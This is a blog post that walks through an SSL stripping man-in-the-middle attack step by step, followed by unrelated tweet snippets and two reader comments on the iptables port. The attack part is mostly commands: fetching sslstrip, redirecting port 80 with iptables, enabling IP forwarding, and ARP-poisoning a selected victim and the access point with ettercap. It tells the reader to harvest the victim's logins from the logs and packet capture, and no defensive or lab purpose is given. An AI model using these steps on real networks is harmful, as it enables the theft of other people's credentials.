Strip SSL via Ettercap Man in the Middle Attack
SSL Strip
This tool provides a demonstration of the HTTPS stripping attacks that was presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
In this article i will walk you through installing SSLstrip along with ettercap and perform a MITM attack.
1) Download Ettercap with GTK
sudo apt-get install ettercap ettercap-gtk
2) Download sslstrip
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
3) Extract sslstrip
tar zxvf sslstrip-0.7.tar.gz
4) Redirect requests on port 80 (HTTP) to sslstrip running on port 10000
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
5) Verify the entry in nat table
sudo iptables --list -t nat
6) Enable forwarding
sudo echo "1" > /proc/sys/net/ipv4/ip_forward
7) Check forwarding
sudo cat /proc/sys/net/ipv4/ip_forward
You should get 1 as a reply
8) Run sslstrip logging on port 10000
sudo python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000
9) Monitor the log
sudo tail -F sslstrip.log
10) Launch ettercap GUI with packet dump
sudo ettercap -G -w ~/ettercap_packets.pcap
11) Enter Unified sniffing
Sniff -> Unified sniffing
12) Select your wireless interface (this may be different than mine, check yours via 'ifconfig')
Network interface: wlan0
13) Scan for hosts
Hosts -> Scan for hosts
14) View hosts list from scan
Hosts -> Host list
15) Select targets
Highlight the victim -> Add to Target 1
Highlight the access point -> Add to Target 2
16) View added targets
Targets -> Current Targets
17) Perform arp poisoning (MITM Attack) on targets
Mitm -> Arp poisoning
You can test the stripping of SSL by browsing to a SSL supported site. http://facebook.com is a good example.
After the victim logs in, you will see the output in your sslstrip.log. Don't forget to go back with Wireshark and see if you got anything good in your ettercap_packets.pcap log.
Enjoy!
Teh haps'
Thu, 02/02/2012 - 19:52
Tim tweeted "@ThatKevinSmith Happy groundhog day! What's your 60 second review of the movie "Groundhogs Day"? #LIVEfrombehind" 7:52pm#- Tim tweeted "Jay and Silent Bob get old! (@ Edwards Renaissance Stadium 14 for Kevin Smith: Live from Behind w/ 2 others) [pic]: http://t.co/0k3NsmV5" 7:37pm#
Mon, 01/30/2012 - 20:15
- Tim tweeted "I had the pleasure of driving a giant circle around LA during rush hour with uber sore legs." 8:15pm#
- Tim tweeted "Goggle tan FTW! :D" 11:16am#
Sat, 01/28/2012 - 12:38
- Tim tweeted "I'm at Mammoth Mountain Ski Resort (1 Minaret Rd, Mammoth Lakes) w/ 5 others http://t.co/SKvBroDM" 12:38pm#
Fri, 01/27/2012 - 21:46
- Tim tweeted "Mammoth bound!" 9:46pm#
- Tim tweeted "I think I like burritos more than pizza now O_o (@ Baja Fresh) http://t.co/FtMOoGu8" 1:17pm#
Thu, 01/26/2012 - 19:23
- Tim tweeted "Just saw a "Veggie TDI" emblem on the back of a Jetta :D I wonder if they had to take out the turbo for the conversion." 7:23pm#
- Tim tweeted "I just became the mayor of Candolyns Salon on @foursquare! http://t.co/El0GAvDM" 7:21pm#
- Tim tweeted "I love meetings where I come out with a bonus :D" 11:29am#
I'm having trouble getting this to work, and I'm wondering if it has something to do with the iptables entry for port 80. Since we are trying to sniff https traffic, wouldn't it be on port 443? Or is there something I'm missing? Thanks!
- reply
Submitted by Anonymous on Mon, 08/01/2011 - 10:13.Port 80 is correct. We will be serving the victim a *NON* SSL page, which will be on the standard HTTP port, 80.
I just checked my personal script i wrote for MITM SSLStripping and it also uses port 80.
- reply
Submitted by Tim Ashley on Mon, 08/01/2011 - 10:28.